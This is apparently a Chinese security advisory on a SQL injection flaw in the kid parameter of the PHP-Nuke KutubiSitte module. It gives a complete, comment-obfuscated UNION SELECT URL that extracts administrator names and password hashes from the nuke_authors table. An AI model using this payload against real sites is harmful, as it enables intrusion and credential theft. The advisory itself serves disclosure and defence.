首页 -> 安全研究

安全研究

安全漏洞
PHP-Nuke KutubiSitte模块kid参数SQL注入漏洞

发布日期:2008-03-06
更新日期:2008-03-10

受影响系统:
PHP-Nuke Kütüb-i Sitte 1.1
描述:
BUGTRAQ  ID: 28126

PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。

PHP-Nuke的实现上存在输入验证漏洞,如果name设置为KutubiSitte且h_op设置为hadisgoster的话,则PHP-Nuke安装的modules.php脚本就没有正确过滤对kid参数的输入,这允许远程攻击者通过特制的SQL查询请求导致执行任意代码。

<*来源:Lovebug
  
  链接:http://secunia.com/advisories/29279/
        http://marc.info/?l=bugtraq&m=120483088717586&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/modules.php?modules.php?name=KutubiSitte&amp;h_op=hadisgoster&amp;kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

http://aluigi.org/poc/maildisable.zip

建议:
厂商补丁:

PHP-Nuke
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://phpnuke.org/

浏览次数:3426
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障